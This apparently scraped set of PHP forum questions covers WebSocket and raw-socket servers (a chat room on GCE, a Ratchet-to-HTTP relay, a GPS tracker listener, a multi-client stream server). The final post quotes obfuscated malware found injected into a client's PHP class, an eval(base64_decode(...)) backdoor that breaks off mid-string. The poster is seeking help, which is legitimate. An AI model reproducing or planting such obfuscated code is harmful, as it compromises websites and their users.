Related
everyone
I'm a new learner with websocket.
I want to deploy my websocket server on GCE.
However, I got some problem.
environment:
Backend:server.php(use php socket function) run on 8080 port
fronend:client.html(simple javascript)
GCE: Ubuntu 18.04, PHP 7.3, apache 2.4.29
without any google cloud sdk (only 2 program and 1 GCE instance)
problem:
Server can work well at my local machine (windows 10), but on GCE websocket will show "1006" error code.
There is a interesting thing that is client.html can work on GCE when I run server.php at local machine.
Is it normal? What is the connection with my local machine and GCE.
Maybe it's not a firewall blocking problem.
I wonder my websocket doesn't run because of the firewall port blocking at first.
I have set the VPC firewall rule with following GCP document and I also disable ufw on GCE.
I change the apache's port from 80 to 8080 and run apache.
It works successfully and I check netstat -an | grep "LISTEN "
I use telnet GCE_IP 8080 at my local machine but it can't connect.
Here is my code:
server.php
<?php
error_reporting(E_ALL);
set_time_limit(0);
class WebSocket {
const LOG_PATH = '/tmp/';
const LISTEN_SOCKET_NUM = 9;
private $sockets = [];
private $master;
public function __construct($host, $port) {
try {
$this->master = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_set_option($this->master, SOL_SOCKET, SO_REUSEADDR, 1);
socket_bind($this->master, $host, $port);
socket_listen($this->master, self::LISTEN_SOCKET_NUM);
} catch (\Exception $e) {
$err_code = socket_last_error();
$err_msg = socket_strerror($err_code);
}
$this->sockets[0] = ['resource' => $this->master];
$pid = posix_getpid();
while (true) {
try {
$this->doServer();
} catch (\Exception $e) {
}
}
}
private function doServer() {
$write = $except = NULL;
$sockets = array_column($this->sockets, 'resource');
$read_num = socket_select($sockets, $write, $except, NULL);
if (false === $read_num) {
return;
}
foreach ($sockets as $socket) {
if ($socket == $this->master) {
$client = socket_accept($this->master);
if (false === $client) {
continue;
} else {
self::connect($client);
continue;
}
} else {
$bytes = #socket_recv($socket, $buffer, 2048, 0);
if ($bytes < 9) {
$recv_msg = $this->disconnect($socket);
} else {
if (!$this->sockets[(int)$socket]['handshake']) {
self::handShake($socket, $buffer);
continue;
} else {
$recv_msg = self::parse($buffer);
}
}
array_unshift($recv_msg, 'receive_msg');
$msg = self::dealMsg($socket, $recv_msg);
$this->broadcast($msg);
}
}
}
public function connect($socket) {
socket_getpeername($socket, $ip, $port);
$socket_info = [
'resource' => $socket,
'uname' => '',
'handshake' => false,
'ip' => $ip,
'port' => $port,
];
$this->sockets[(int)$socket] = $socket_info;
}
private function disconnect($socket) {
$recv_msg = [
'type' => 'logout',
'content' => $this->sockets[(int)$socket]['uname'],
];
unset($this->sockets[(int)$socket]);
return $recv_msg;
}
public function handShake($socket, $buffer) {
$line_with_key = substr($buffer, strpos($buffer, 'Sec-WebSocket-Key:') + 18);
$key = trim(substr($line_with_key, 0, strpos($line_with_key, "\r\n")));
$upgrade_key = base64_encode(sha1($key . "258EAFA5-E914-47DA-95CA-C5AB0DC85B11", true));
$upgrade_message = "HTTP/1.1 101 Switching Protocols\r\n";
$upgrade_message .= "Upgrade: websocket\r\n";
$upgrade_message .= "Sec-WebSocket-Version: 13\r\n";
$upgrade_message .= "Connection: Upgrade\r\n";
$upgrade_message .= "Sec-WebSocket-Accept:" . $upgrade_key . "\r\n\r\n";
socket_write($socket, $upgrade_message, strlen($upgrade_message));
$this->sockets[(int)$socket]['handshake'] = true;
socket_getpeername($socket, $ip, $port);
$msg = [
'type' => 'handshake',
'content' => 'done',
];
$msg = $this->build(json_encode($msg));
socket_write($socket, $msg, strlen($msg));
return true;
}
private function parse($buffer) {
$decoded = '';
$len = ord($buffer[1]) & 127;
if ($len === 126) {
$masks = substr($buffer, 4, 4);
$data = substr($buffer, 8);
} else if ($len === 127) {
$masks = substr($buffer, 10, 4);
$data = substr($buffer, 14);
} else {
$masks = substr($buffer, 2, 4);
$data = substr($buffer, 6);
}
for ($index = 0; $index < strlen($data); $index++) {
$decoded .= $data[$index] ^ $masks[$index % 4];
}
return json_decode($decoded, true);
}
private function build($msg) {
$frame = [];
$frame[0] = '81';
$len = strlen($msg);
if ($len < 126) {
$frame[1] = $len < 16 ? '0' . dechex($len) : dechex($len);
} else if ($len < 65025) {
$s = dechex($len);
$frame[1] = '7e' . str_repeat('0', 4 - strlen($s)) . $s;
} else {
$s = dechex($len);
$frame[1] = '7f' . str_repeat('0', 16 - strlen($s)) . $s;
}
$data = '';
$l = strlen($msg);
for ($i = 0; $i < $l; $i++) {
$data .= dechex(ord($msg{$i}));
}
$frame[2] = $data;
$data = implode('', $frame);
return pack("H*", $data);
}
private function dealMsg($socket, $recv_msg) {
$msg_type = $recv_msg['type'];
$msg_content = $recv_msg['content'];
$response = [];
switch ($msg_type) {
case 'login':
$this->sockets[(int)$socket]['uname'] = $msg_content;
$user_list = array_column($this->sockets, 'uname');
$response['type'] = 'login';
$response['content'] = $msg_content;
$response['user_list'] = $user_list;
break;
case 'logout':
$user_list = array_column($this->sockets, 'uname');
$response['type'] = 'logout';
$response['content'] = $msg_content;
$response['user_list'] = $user_list;
break;
case 'user':
$uname = $this->sockets[(int)$socket]['uname'];
$response['type'] = 'user';
$response['from'] = $uname;
$response['content'] = $msg_content;
break;
}
return $this->build(json_encode($response));
}
private function broadcast($data) {
foreach ($this->sockets as $socket) {
if ($socket['resource'] == $this->master) {
continue;
}
socket_write($socket['resource'], $data, strlen($data));
}
}
}
$ws = new WebSocket("localhost", "8080");
client.html
<html>
<head>
<title></title>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<style>
p {
text-align: left;
padding-left: 20px;
}
</style>
</head>
<body>
<div style="width: 800px;height: 600px;margin: 30px auto;text-align: center">
<h1>chat room</h1>
<div style="width: 800px;border: 1px solid gray;height: 300px;">
<div style="width: 200px;height: 300px;float: left;text-align: left;">
<p><span>online:</span><span id="user_num">0</span></p>
<div id="user_list" style="overflow: auto;">
</div>
</div>
<div id="msg_list" style="width: 598px;border: 1px solid gray; height: 300px;overflow: scroll;float: left;">
</div>
</div>
<br>
<textarea id="msg_box" rows="6" cols="50" onkeydown="confirm(event)"></textarea><br>
<input type="button" value="send" onclick="send()">
</div>
</body>
</html>
<script type="text/javascript">
var uname = prompt('type your name', 'user');
var ws = new WebSocket("ws://127.0.0.1:8080");
ws.onopen = function () {
var data = "system:connect successfully";
listMsg(data);
};
ws.onmessage = function (e) {
var msg = JSON.parse(e.data);
var sender, user_name, name_list, change_type;
switch (msg.type) {
case 'system':
sender = 'system: ';
break;
case 'user':
sender = msg.from + ': ';
break;
case 'handshake':
var user_info = {'type': 'login', 'content': uname};
sendMsg(user_info);
return;
case 'login':
case 'logout':
user_name = msg.content;
name_list = msg.user_list;
change_type = msg.type;
dealUser(user_name, change_type, name_list);
return;
}
var data = sender + msg.content;
listMsg(data);
};
ws.onerror = function () {
var data = "system : something wrong";
listMsg(data);
};
function confirm(event) {
var key_num = event.keyCode;
if (13 == key_num) {
send();
} else {
return false;
}
}
function send() {
var msg_box = document.getElementById("msg_box");
var content = msg_box.value;
var reg = new RegExp("\r\n", "g");
content = content.replace(reg, "");
var msg = {'content': content.trim(), 'type': 'user'};
sendMsg(msg);
msg_box.value = '';
}
function listMsg(data) {
var msg_list = document.getElementById("msg_list");
var msg = document.createElement("p");
msg.innerHTML = data;
msg_list.appendChild(msg);
msg_list.scrollTop = msg_list.scrollHeight;
}
function dealUser(user_name, type, name_list) {
var user_list = document.getElementById("user_list");
var user_num = document.getElementById("user_num");
while(user_list.hasChildNodes()) {
user_list.removeChild(user_list.firstChild);
}
for (var index in name_list) {
var user = document.createElement("p");
user.innerHTML = name_list[index];
user_list.appendChild(user);
}
user_num.innerHTML = name_list.length;
user_list.scrollTop = user_list.scrollHeight;
var change = type == 'login' ? 'online' : 'offline';
var data = 'system:' + user_name + ' is' + change;
listMsg(data);
}
function sendMsg(msg) {
var data = JSON.stringify(msg);
ws.send(data);
}
</script>
on GCE VM:
update
internal IP: .3
external IP: .62
1.
netstat -an | grep "LISTEN " to check if you configured internal IP instead of localhost or/and 127.0.0.1
.
I change my internal IP in the server.php and run.
It looks like working perfectly.
2.
Connection check from the GCE VM to GCE_VM_INTERNAL_IP:8080.
.
Connect successfully!
3.
Connection check from you personal computer to
GCE_VM_EXTERNAL_IP:8080. Also, consider to use curl instead of
telnet
.
It seems that handshaking can work.
I can get websocket message from GCE with internal IP and PC with external IP.
So my problem is maybe like in javascript?
It doesn't send the handshaking frame.
I am going to build a system which will receive a streaming raw data form browser. Data will use websocket to transmit and receive, then system will keep going to send chunk data to HTTP server. Flowchart show below:
First, I separate websocket server and HTTP client into 2 program, both can work. websocket server use ratchet, HTTP client use stream_socket_client and stream_select.
Then, I try to combine websocket server and HTTP client together, I can receive data from browser but I cannot get any response from HTTP server. How can I get HTTP response in Ratchet? Many Thanks.
The following is my php code:
Chat.php
<?php
namespace MyApp;
use Ratchet\MessageComponentInterface;
use Ratchet\ConnectionInterface;
function read_response_code($response){
foreach (explode("\n", $response) as $a) {
if (strpos($a, 'HTTP/1.1') !== false) {
$arr = explode(" ", $a);
if ($arr[1] != "100")
{
return 0;
}
return 1;
}
}
return 0;
}
class Socket implements MessageComponentInterface {
protected $clients;
public function __construct(){
$this->clients = new \SplObjectStorage;
$this->SERVER = "tcp://192.168.0.1:80";
$this->socket = [];
$this->clients->connect = 0;
}
public function onOpen(ConnectionInterface $conn) {
// Store the new connection to send messages to later
$this->clients->attach($conn);
echo "New connection! ({$conn->resourceId})\n";
echo "Try to connect http server...\n";
$this->socket = stream_socket_client($this->SERVER, $errno, $errstr, 30);
if (!$this->socket){
//disconnect websocket
$conn->close();
}
else{
$header = "POST / HTTP/1.1\r\n"
. "Host: 192.168.0.1\r\n"
. "Accept: */*\r\n"
. "Content-Type: application/octet-stream\r\n"
. "Transfer-Encoding: chunked\r\n"
. "Expect: 100-continue\r\n\r\n";
$written = fwrite($this->socket, $header);
$response = fread($this->socket, 100);
$ret = read_response_code($response);
if ($ret == 0)
{
echo "Connect HTTP server fail.\n";
$conn->close();
}
else
{
echo "Connect success!!!!\n";
$this->clients->connect = 1;
}
}
}
public function onMessage(ConnectionInterface $from, $msg) {
//combine http client
if ($this->clients->connect == 1)
{
$read = array($this->socket);
$write = NULL;
$except = NULL;
$num = stream_select($read, $write, $except, 0, 400000);
if ($num === false) {
/* Error handling */
}
elseif ($num > 0) {
// cannot read any response
echo "xxxxxxxxxxxxxx";
}
else {
// send data to HTTP server
$size = strlen($msg);
$hex = dechex($size);
fwrite($this->socket, "$hex\r\n");
$written = fwrite($this->socket, $msg);
fwrite($this->socket, "\r\n");
}
}
}
public function onClose(ConnectionInterface $conn) {
// The connection is closed, remove from connection list
$this->clients->detach($conn);
echo "Connection {$conn->resourceId} has disconnected\n";
}
public function onError(ConnectionInterface $conn, \Exception $e) {
echo "An error has occurred: {$e->getMessage()}\n";
$conn->close();
}
}
Chat-server.php
<?php
use Ratchet\Server\IoServer;
use Ratchet\Http\HttpServer;
use Ratchet\WebSocket\WsServer;
use MyApp\Chat;
require dirname(__DIR__) . '/vendor/autoload.php';
$loop = \React\EventLoop\Factory::create();
$server = IoServer::factory(
new HttpServer(
new WsServer(
new Socket()
)
),
8080
);
$server->run();
HTTP_client.php
<?php
$SERVER = "tcp://192.168.0.1:80";
$SEND_STATUS = 0;
$file = fopen("test.raw", "rb");
$socket = stream_socket_client($SERVER, $errno, $errstr, 30);
$header = "POST / HTTP/1.1\r\n"
. "Host: 192.168.0.1\r\n"
. "Accept: */*\r\n"
. "Content-Type: application/octet-stream\r\n"
. "Transfer-Encoding: chunked\r\n"
. "Expect: 100-continue\r\n\r\n";
$written = fwrite($socket, $header);
$response = fread($socket, 100);
function send_data($file, $socket, $bytes) {
global $SEND_STATUS;
if ( feof($file) ) {
$SEND_STATUS = 1;
fwrite($socket, "0\r\n\r\n");
fclose($file);
return(false);
}
$buffer = fread($file, $bytes);
$size = strlen($buffer);
$hex = dechex($size);
fwrite($socket, "$hex\r\n");
$written = fwrite($socket, $buffer);
fwrite($socket, "\r\n");
}
while (true) {
$read = array($socket);
$write = NULL;
$except = NULL;
$num = stream_select($read, $write, $except, 0, 400000);
if ($num === false) {
/* Error handling */
}
elseif ($num > 0) {
foreach ($read as $r) {
echo "xxxxxxxxx";
}
}
else {
if ( $SEND_STATUS === 0 ) {
send_data($file, $socket, 16000);
}
}
}
?>
I got this error:
Warning: socket_select(): supplied argument is not a valid Socket resource in /volume1/web/is/xxxx/listen-new.php on line 12
PHP Warning: socket_select(): supplied argument is not a valid Socket resource in /volume1/web/is/xxxx/listen-new.php on line 12
this my snippet code
My code is:
$port = $this->port;
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_set_option($sock, SOL_SOCKET, SO_REUSEADDR, 1);
socket_bind($sock, 0, $port);
socket_listen($sock);
$this->clients[] = $sock;
$data = array();
while (true) {
$read = $this->clients;
$write = array(); //NULL
$except = array();//NULL
$sckt = socket_select($read, $write, $except, 0);
if($sckt === false){
echo "socket_select() failed, reason: " .
socket_strerror(socket_last_error()) . "\n";
}
elseif($sckt > 0) {
if (in_array($sock, $read)) {
$this->clients[] = $newsock = socket_accept($sock);
//var_dump($this->gps);
socket_write($newsock, "Connected\n");
//var_dump($this->gps);
/**try{
socket_getpeername($newsock, $ip); //error
echo "New client connected: {$ip}\n";
}
catch(Exception $e){
echo "error : $e->getMessage()\n";
}**/
$key = array_search($sock, $read);
unset($read[$key]);
}
foreach ($read as $read_sock) {
$data = #socket_read($read_sock, 2048);
if ($data === false) {
$gpsdisc = array_search($read_sock, array_column($this->gps, 'pid'));
$key = array_search($read_sock, $this->clients);
unset($this->clients[$key]);
unset($this->gps[$gpsdisc]);
echo "client disconnected.\n";
continue;
}
else{
$data = trim($data);
if (!empty($data)) {
var_dump($data);
$buf = bin2hex($data);
$start = substr($buf, 0,4);
if($start=="7878"){
$protocol = substr($buf, 6,2);
if($protocol=="01"){
$imei = substr($buf, 8,16);
$cariGPS = $this->cariGPS($imei);
if($cariGPS!=NULL){
$this->setGPS($imei,$read_sock,$cariGPS);
$reply = $this->authLogin($data);
$rep = hex2bin("$reply");
socket_write($read_sock, $rep, strlen($rep));
}
else
echo "$imei salah";
}
elseif($protocol=="15"){
//echo "$buf\n";
$this->reply($data);
}
elseif($protocol=="12"){
$hex12 = bin2hex($data);
//echo "$hex12\n";
}
else{
$hex12 = bin2hex($data);
echo "$hex12\n";
}
echo "$protocol\n";
}
else{
if($data=="where"){
//echo $data."\n";
$this->where($this->gps);
}
elseif($data=="quit"){
$gpsdisc = array_search($read_sock, array_column($this->gps, 'pid'));
unset($this->gps[$gpsdisc]);
socket_close($read_sock);
$key = array_search($read_sock, $this->clients);
unset($this->clients[$key]);
}
else{
echo "command not found\n";
}
}
}
}
}
}
}
socket_close($sock);
PS I also had to change $write = null and $except = null
Are there any solution for this?
It looks like you supplied only the server code but omitted the client code. Can you post the client code please? I guess the problem is there. With my test client (fyi I used socket_create) I cannot reproduce the problem you are reporting.
Also mine is php7 (if you are curious).
This may have some hints for you: Socket_read() says "not a valid resource"
I am creating a socket script that will listen to our 3 devices.and the device is setup in one server ip and one port only.
$file = fopen('txt.log','a+');
$server = stream_socket_server('tcp://'.$ipserver.':'.$port, $errno, $errorMessage);
if(!$server) {
echo "$errorMessage ($errno)<br />\n";
}
else{
while($client = #stream_socket_accept($server,$timeout)) {
stream_copy_to_stream($client, $file);
fclose($file);
fclose($client);
}
}
but the problem is that if one device is connected,the two devices cannot connect anymore.I appreciate some one can help me how to get this work.or give me some idea
Thank you in advance.
$file = fopen('txt.log', 'a+');
$server = stream_socket_server("tcp://$ipserver:$port", $errno, $errorMessage);
if (!$server)
echo "$errorMessage ($errno)<br />\n";
else
{
$s = array($server);
$t = $timeout == -1 ? NULL : $timeout;
while ($r = $s and stream_select($r, $n=NULL, $n=NULL, $t))
foreach ($r as $stream)
if ($stream == $server) // new client
$s[] = stream_socket_accept($server, -1);
else
if (!fputs($file, fgets($stream)))
{
fclose($stream);
array_splice($s, array_search($stream, $s), 1);
}
}
I built a website for a client a while ago who has been having issues with it. After getting into the site files I found this at the top of one of the PHP classes:
<?php
/*ad0b18735e68b25aa9c4374221824db5_on*/ $byJtFKIhXRt8KPNfT1me8ooOBXon8QgWfQgLqPSdxb= array('8759','8776','8755','8766');$ARPcAGpFFDTk4GyiFfpsl5zXmfFqCHsAp8DQFSlbm5lhCJq8P= array('8569','8584','8571','8567','8586','8571','8565','8572','8587','8580','8569','8586','8575','8581','8580');$J0BQOOWj4oRnP7liN= array('7450','7449','7467','7453','7406','7404','7447','7452','7453','7451','7463','7452','7453');$UbjPmIKWlC="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBvVmpGc2JsTXdUa2RpVjFKWVRsZHdhMUl5ZURKWmJYYzFZa2RXU0dKSWNHdFRSVEYyVTFkMGEySkhVa1pOVjJocFZqQldjRk14VG5OT01HeEVVVzB4YTFaNlZuRmFSV1J6WkcxS2NGRnVVbWxOYkVwdFYxUkpOV1JWZEVSVmJXeHJWakZzZDFwVVRrOU5SMDV6VDFoQ2FtSldXak5aYTJSSFlXeHdWRm95YkZGU01IQXlWMnRvY2tzd2JIQmtNbXhSVWpCd01sZHJhSEpMTUd4d1pESjBXbUpzV25SVVJVNVRZVzFLZFZWdFdtaFJNbk16V1Zaa1dsb3dkRVJWYlhCcFlteEtiVmxWVGtKUFZrSlVVVmhvVEZVd1NUTlRhMlJMVFZad2NGRlViRXBUUlRSM1dUSjNOV05IVG5SV2JtUnBVakJhY1Zkc1RtNWhWa0pJVTI1YVlWTkhjM0pUVjJ3ellWWkNTRk51V21GVFIzTnlVMWRzUW1SVmJFbFVha0pxWWxkNE0xbDZTalJoUjAxNVlVZDRhbVZYWkhKWFJFWlBVbXhXYzFkcldsWmlTRTV3VjJwSk5XUnNjRVJUYlZKTVZUTmtjbGRYTlZkaVZYUlZZekprYW1KV1dYZGFSbWhMWkZWc1JGVnRiR3RXTVdzeldteG9UMDFIVG5OUFdFSnFZbFphTTFsclpFZGhiSEJVV2pKc1VWRjZiSEJaYWtwVFRsWkNjRk5ZVGtwaGJtUXlWMWN3TldFeVZsVk9SMnhOVVRGS2NGcEdaRnBqTUhCSVZHNVdhMUpxYkhaVE1WSXdZMFp3Y0ZGWE9VdFNNRFV4V2tWWk5XSXdiRVZOUkd4S1VrVldkMU5WYUhwaE1XeDFWbTB4U2xKRVFtNVplazVUWlZabmVXSkliR0ZYUlVwNlYxWmtUMkpGZEVSVFZHaE5UV3R3TWxkcmFISkxNR3h3WlVod2ExTkZjSGRaTUdoUFl6RnNXVlJ0T1dGWFJURjJVMnRaTlZaR1NsZFRiR1JUVm10d2FWTlhNV3RrYlVsNVZWZHNXVlV5ZERGVFYzQXpaR3hzZEU5WGRHeFdSRkp3VkVWT1UyRlhVbGhYV0VKUVpWVktOVmRzYUZOTlYwNTBUa2RrUzFJd2IzaFhiWEF3VDFkT2RGWnFRbXRYUlhBeFUxVk9VMkZYVWxoWFZHUnRWakZ2ZUZsdE1VOU5SMFpZVDFoV1NsSjZiRE5YVm1NeFkyMUdWRm95ZEZwaWJGcDBVekZvZW1FeGIzcGpSMXBoVlRCRk5WTlZaR0ZoUjBwSlZHMTRVR1ZXU25aWFJFb3pXakZDVkZGdE9XRldNRnB5VjJ4b1MyVnNaM2xsU0VKcVRURkdkbE14VWpCalJuQndVVmM1YUZaNlZtMVhWbWhMWlZac1dXRXlPVXBoTURVeVdXMDFVMkpIU25WVldGSlRWbnBXY1ZscVNsTmpSMHAwV1hwYVNsSXlVVEpaVm1oQ1lWVjRSRkZYZEdoU2FteDZVekZPY2xveVZqVlJWM1JoVFROQ2JWZHNUa0pQVld4SlZXNXNhMVl4VlROYWJHUnpZbFZzUkZveWRHRk5NMEp0VjJ4T2MwNHdjRWxWYmxKcVVqRndNVmRXWTNoaVJXeEZUVWRrYTFJeFdqQlpNR014WVVkS1ZGb3liRTFOTVVvd1dUQk9TbU13YkVSVGEyUlZUVVJvY0ZNeFVqQmlWMFpZWlVkNFdVMHdTWGhhUlZrMVlXMUplVTVVUW1GV2VsVjNXVE5zYm1FeVVraE5XR1JoWWxSV2IxbHNaRlpqTUd4RVZXMXNhMVl4YkhkVU0yeFRUbXh3UkZGVWJFcFNNbEV5V1dwT1EySkhTbkJhTW5SclVucEdNMWR0TURGaFIwcFlWbGhPU2xFd2NEVlRWMnh5VGpCd1NGUnVXbWxpYkVweldXMDFVMlZyYkVWTlIyUmhUVE5DTlZkc1pFZGhNSFJFVldwYVlWRXpaRzVVVmxKQ1pEQXhSVkZZWkU1U1JVWjNWRE5zVTJGdFNYbE9WRUpoVm5wVmQxa3piRUpQVld4SVRWaGFZVkpxYkhGWmFra3dZakJ3U0ZSdVdtbGliRXB6V1cwMVUyVnJkRlZrUnpWc1lsVTFlbGxxVGs5aVJYUkVWV3BhWVZFeWN6TmFSbU14WXpKR1dFNVlTa3hSTVVsM1dXeG9RMkpYU25SU2JsSmhWVEp6TTFOclpFOWtiVXAxVlcxNGFXSnNTalpUVlZGM1dqRnZlbU5IZUdsaVZUVXlWMnRrVm1Jd2NFaFVibHBwWW14S2MxbHROVk5sYTNSVlpFUnNTbEl4V25wWmVrcFdXakpXTlZWdGNHbE5hbFYzVjJ4ak1VMUhUalZSVkd4S1VucEdNbGRyV1RWaGJVbDVUa2M1UzFJd2IzaFhiV3h5VGpKYVZGVnVUbUZXZWxKdVZVWk9RMlZ0VWtsVGJrNWhWbnBTZGxOclpFOWtiVXAxVlcxNGFXSnNTalpUTVZJd1lqRndXRkp0ZEdGWFJXeDJVMWQwVDJSdFNuVlZiWGhwWW14R01GWkZaRmRrVm05NlZXMDVVR0ZWUm5CVVIyeFRZekZ3V0U1SVFsQk5NSEJ6V2tWb1YyVlhTbkJhTW5SYVRXcHNNVnBGWkZka1YxSkpWRmhDVUUxNlFtNVhiVFZYWkZacmVsVnVRbWxOYWxKdVZXcEtWMDFHVWxoU2JsSmFWVEprZDFwWWJGTmtSMGw2VlcwNVlWZEZiRzVWUms1Q1lWZEtXRlZ1YkdsV01WcHlXVlprUjJKdFRuUlBWRVpxVVhwV2NWbHFTWGRoVlRoNlUyMTRhMU5HV2pWWmJXeENZVEpLV0U5VVFtaFNNVm8xVkhwTmVHUnNiSE5QV0hCclVqQmFOVnBGVG01aFYwbDZVVzFvYVdKWVVuZFRWMnh5VGpGd2RWWnVWbHBOTVVwM1dXcEpNRm94YkZoaFJ6RnJWakZLZEZsclpHRk9iSEJJWVVjeGFGTkZNWFpUYTJoRFlVVjBXV015ZEdsV01Gb3dWMVpPUWs5VmJFWmFSM2hyVWxSR2IxbHNaRVppTUhSVll6SjBZV0pYZUhwWGJFNUNUMVZzU1ZadWJHbFNNVm94VjFSSk5XRXhjRlJoUjFwWlRVWndTMVpGVmxkYWJHZzFZWHBrYUZZeGJHNVRNR1J6WlcxTmVWWnFRa3hSTVVwdFZsUkNWMVV4V25KV2JFNVlaVlZ3U2xacldsTlZWbWQzWVVaQ1ZrMVdSbkJYUms1eVkwZFdOVlZ0T1dsTk1EUjNVMVZSZDFvd2NFZFBWbEpUVm10d1dGVnNXa3RaYTJ4eVlVWldWMUpyU20xVk1GVTFWa1phUkZOdFVsQk5la0p1VjJ4a05HVnNjRlJSYW1STFVqSm9NbGw2VGxKYU1VSlVVVmRzU21GdVVUVlpWbVJhV2pCMFNHSkljR3BOYkZsM1V6Qk9VMXBzVlhkV2JFNVhZVEZhVkZZemJFdFZNVXBXVFZaQ1YxSldXbTFWVmxaVFVsWldjRk50VWt4Vk1uY3pVMnRrYzJRd2JFVk5SMlJMVW1wc1ZWVnNXa3RXTVVwWFUyMUtTbUpGY0VkV1JsVTFWbFpLVjA5VlNsTlNWa3BVVTFkM2QwNHlXbFJSYlhocFUwVTFjMU5WYUhwaE1rWlpVVmRrVVZVd1JuQlRWM0F3VDFkR1dGZFhaRXhTTW5nMldYcEtWMDFGZEVSVmJWcFdUVVphVkZadGRGZFZNV1ExVTJ0c1YxSnNTbEpYUkVaTFVteEtjbFpzVGxOV2EyeHdWMFpPY21OSFZqVlZibXhoVmpGc2JsVkdUa05OVjA1MFpVZDRhV0pWTlRKWGEyUldZakJ3UjA5V1VsTldhM0JZVld4YVMxbHJiSEpoUmxaWFVtdEtiVlpYZEZkU01VcFhVMnRhVm1GVmNHdFRNVkl3VDFWc1NGWnVUbXBOYkZadVdsaHNVMlZXY0ZoWFYyUlJWVEJHY0ZOWGNEQlBWMFpZVjFka1RGSXllRFpaZWtwWFRVVjBSRlZ0V2xaTlJscFVWbTEwVjFVeFpEVlRhMnhYVW14S1VsZEVSbGRXUmtwWFUyMWFVbFpYVWtkV1IzaFNZVlpvVkdFelFteGxWa2w0VjFaT1FrOVZiRWxXYm14cFVqRmFNVmRVU1RWaE1YQlVZVWh3YTFORmIzZFpha28wWkcxUmVWWnViRXhSTVVwdFZsUkNWMVV4V25KV2JFNVlaVlZ3U2xacldsTlZWbWQ0Vm14U1UxWnJjRzFWVmxaclVteFNjMVZYYkZsVk1uUjNWSHBOZDFveGNGaGxTSEJoVlRCSk0xTnJhRmRoUld4RlRVZGtTbUZWYXpOYWJHUnpZbFZzUkdGSVFtcE5NRFZ6V2tWT2JtRXhaM2hVYTFwV1lrWndSMVpYZUhwaFZsWlhWbXRhVm1KSGVHMVdWRVpUVlRGT1ZrNVZhRXBpUkVKM1V6Rm9lbUV5VGxsVVYyUlJWVEJKZUZreU1UUmlSMHAwVkc1YVlWSXhWblpUYTFrMVZrWktWMU5zWkZOV2EzQnBVMWQ0UjFac1NsZFRiSEJaVFZVMVZsWlhkSE5VTVVvMVUyMVNURlpJVVRWVFZXUlhZekpOZVZaWFpHeGxWa28wV1ROc1FrOVZiRVJUVjJ4UVRYcENjbHBHYUV0ak1XZzJVVmRrVVZVd1JuQlpWV2hUVFVkT1JXSXpXazFsVld4dVZFZHNRbUV5VGtoU1ZHUkxVMFphTlZscldUUmxSV3hGVFVka1NtRlViSGhYYkdSVFkwVjRkVkZ0T1dwU1JHdDVWMnhvUzJWdFJsaFBXRlpSVmtWRk1WUXhVazVpVjBwWVQxUkNhRkl4V2pWVlJrNUtXakI0Y0ZWdVVscFdla1p2VTFWTk1Gb3diSEJYYlRGb1ZqTm9jMVZHVGtwYU1IaHdVVmQwWVdKWGVIcFhiRTVDWkZWc1JGTlhNV2hTZW13MldrVlJkMkZWYkVST1IyUkxVakpvTWxsNlRsSmFNSGh3VVZkc1MySlhlRE5WUms1S1dqQjRjRkZYZEdoWFJVWnVWRWRzUW1GVmNIVlRiWGhoWVdwQ2NGTlZUVEJhTUhCSlUyMTRZV0ZWUmpGVFZVNUtZbGRTV0ZKVWJFcGhWVVl4VTJ0b1YyRkZiRVJPUjJSS1lWWndORmt6YjNkaFZXeEVUa2RrUzFORldqWlVNMnhUVFVkT2RXRXlaRkZWTUVsM1dUSTFWMkpGT0hsaVJ6Rk1VVEJLZEZwR1l6RmhiVkpJWWtoYWFXSkViSE5hVldSelpXMVNTVlJYT1VwaVZUUjRXVEl4TkZwdFJsaE9XRUpyVVRCc2QxTlZUbk5PTUhCSVZHMDVTbEpFUW01WFZFNVhaVmRLUjA5WVFtbGlWM2QzVXpCT1UwMVhUblJsUjFwT1VUQkdNVk5WVGxOTlYwNTBaVWRhVGxVeWN6TlhWRTVYWlZkS1IwOVljR0ZYUmtveVdUQm9VbUl3Y0VoVWJUbE5VVEJLUlZac1drdFVWbEY0VVd4V1dVMVZjRWRXYTFwWFZURlNjMVZzVGxKV1ZGWlZWVzEwVjFVd2VFUlJXR2hNVmtoU2NWcEdhRXRqTVdkNlZHMTRhMUo2YkROYVJVNXVZVEZyZVZvelRrcFNWVFZYVmxkME5GVkdWa2RWYlZwWFVsZDRUMVZzVlRWV2JGcEVaREprVG1WWGN6TlRhMmhYWXpKU1JGRlViRXBUUmtvMVdWWmpkMkl4YTNwV2JteHBVbXBzYzFwVlpGZGhhM1JFVlcxd2FGRXlkSGRVTTJ4VFRVZE9kV0V5WkZGVk1FcDBWMVprTkdWc2NGVmtSR3hLVWpKNGRGTlZUbTVpTWtaWVRsaENXVTF0VW5OYVJVNXVZVlpzV0dWSVRtbE5NbEp0V2tab1MyTXhaM2xYYmxwcVVqRmFNVk5YYkhKalJXeEVWMWN4U2xFeFNYZFpNalZ5WTBWc1NXTXlkR3RXTTJkM1UxVlJkMW95VWtsVGJrSnBWVEpvUWxkdE1YTmpNWEJYVDFjMVlWZEdTbTFYVkVrMVpGZFNTRlp1Vm10VFJURjJVMnRvVjJWWFNrZFBTR1JLVVhwU2JsTnJhRmRsVjBwSFQwaG9URlV5Y3pOVGEyaFRaVmRXVkZGVWJFcFNNWEJ2V1d0b1QySkZPSHBOV0VKaFlWZGtjbHBGYUV0T1ZYUlpZekowWVdKclJtNVZSazVEWWxkTmVVOVhjR2hOYW13elYyeGpNR0l3Y0VsUmJXaE5VVEJGTUZSVlRqTmFNSEJJVm01c2FtSlVWakpVUlU1Q1lURndXVk51YkdwTk1VbzFWRVZPUW1Wck1VUmhlbVJvVmpGc2JsTXdUbE5pVjA1RVlUSmtiR1ZXU2pKYVJtaFNXakZDVkZGWGJGTk5SbHBXVTFWT1UwMVhUblJsUjFwT1ZUQktTbFpyV2xOVlZYZzJVbGhXVGxKdWFEVlhSV013WVZVNU5WVnVXbXRYUmtadVZFZHZkMW93YkhKaFNGcHFUVEZGTWxOVlRsTmtNV3hYWlVoc1dWSjZVbkJVTTJ4VFpHMVNXVlZYWkUxaGFrSnVVMWQwVDJSdFNuUk9WM2hhVFRGS2QxbHFTVEJPYTJ4R1ZHNU9hVTB3TlhOWFJXaExXVEpLYzJWSWJ